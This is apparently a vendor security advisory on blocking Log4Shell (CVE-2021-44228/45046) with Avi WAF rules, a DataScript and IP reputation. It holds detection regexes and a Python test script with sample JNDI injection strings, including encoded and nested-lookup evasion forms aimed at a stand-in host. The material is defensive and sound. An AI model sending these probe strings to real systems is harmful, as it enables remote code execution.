Update Dec 16th:
The recommendations have been updated.
Resolution has been updated with the changes.
As the NSX Advanced Load Balancer (Avi) Platform provides multiple layers of Application Protection, there are several features that can be used and enabled.
As minimum protection we recommend using either NSX Advanced Load Balancer (Avi) WAF or NSX Advanced Load Balancer (Avi) DataScript, in combination with IP Reputation blocking.
All of the proposed features are available to customers subscribed to Avi Pulse Cloud Services without extra charge.
Here are the individual steps:
Download Avi CRS 2021-4 from the NSX Advanced Load Balancer (Avi) customer portal.
We recommend one of the following:
SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* "@rx \${(?:jndi|ctx):" "id:4099843,phase:2,block,t:none,t:lowercase,t:urlDecodeUni,multimatch,msg:'CVE-2021-44228 / CVE-2021-45046 log4j vulnerability',tag:'attack-rce',tag:'paranoia-level/1',severity:'CRITICAL'"
SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* "@rx \${[^}]{0,4}\${" "id:4099844,phase:2,block,t:none,t:lowercase,t:urlDecodeUni,multimatch,msg:'CVE-2021-44228 / CVE-2021-45046 log4j vulnerability evasion',tag:'attack-rce',tag:'paranoia-level/1',severity:'CRITICAL'"
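To make clear what the two rules above do and do not catch, here is an added Python example (not code from VMware, Avi or the CRS) that replays the rule logic on single request values: it applies the transformation chain t:none, t:lowercase, t:urlDecodeUni the way multimatch does (evaluating the operator after every stage) and reports which rule ids fire. The sample inputs are constructed for illustration and use the reserved example.invalid domain; the helper names are this example's own, and a real WAF evaluates the rules per variable (REQUEST_LINE, ARGS, headers, ...) rather than on one string.

```python
import re
from urllib.parse import unquote

# Regexes copied from the two SecRule lines (ids 4099843 and 4099844).
# "\$\{" is the Python spelling of the rule's "\${".
RULES = {
    4099843: re.compile(r"\$\{(?:jndi|ctx):"),   # direct ${jndi: / ${ctx: lookup
    4099844: re.compile(r"\$\{[^}]{0,4}\$\{"),   # nested ${..${ used to obfuscate "jndi"
}


def url_decode_uni(value):
    """Approximation of ModSecurity's t:urlDecodeUni (assumption: %XX plus
    Microsoft-style %uXXXX escapes; the real transformation also covers
    a few more edge cases)."""
    value = re.sub(r"%u([0-9a-fA-F]{4})",
                   lambda m: chr(int(m.group(1), 16)), value)
    return unquote(value)


def transformation_stages(value):
    """Yield the value after each step of t:none,t:lowercase,t:urlDecodeUni.
    multimatch means the operator runs after every step, so all stages count."""
    yield value                      # t:none
    value = value.lower()            # t:lowercase
    yield value
    value = url_decode_uni(value)    # t:urlDecodeUni (after lowercasing, as in the rule)
    yield value


def matching_rules(value):
    """Return the sorted list of rule ids that would block this value."""
    hits = set()
    for stage in transformation_stages(value):
        for rule_id, pattern in RULES.items():
            if pattern.search(stage):
                hits.add(rule_id)
    return sorted(hits)


if __name__ == "__main__":
    # Constructed sample values: three probe styles plus a benign string
    # containing a non-malicious "${...}" placeholder.
    samples = [
        "${jndi:ldap://example.invalid/a}",                     # plain probe
        "%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D",    # URL-encoded
        "%u0024%u007Bjndi:ldap://example.invalid/a}",           # %u-encoded
        "${${lower:j}ndi:ldap://example.invalid/a}",            # nested-lookup evasion
        "Mozilla/5.0 (total=${total})",                         # benign placeholder
    ]
    for s in samples:
        print(f"{s!r:60} -> {matching_rules(s)}")
```

The last sample shows why the evasion rule limits the nesting gap to four characters: a lone `${total}` placeholder in a header or query string does not trigger either rule, while `${${lower:j}ndi:...}` is caught by 4099844 even though 4099843 never sees the literal string `${jndi:`.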
As another method to protect against CVE-2021-44228 we developed a DataScript that blocks the attack vectors.
The DataScript is available in the Avi DataScript Github repository.
It needs to be installed as follows:
Below is an example of an attack being blocked by the DataScript.
IP Reputation(*):
During our investigation we noticed that many of the IPs constantly scanning the internet for vulnerable machines are already covered by our IP Reputation service. We highly recommend using the included NSX Advanced Load Balancer (Avi) IP Reputation protection to block these known threat actors from accessing your applications.
Note: As reported, many scans are routed through the Tor network; blocking these IPs therefore also impacts general availability of your applications to legitimate users coming through Tor.
Below is an example of an IP currently blocked through IP Reputation.
Change log: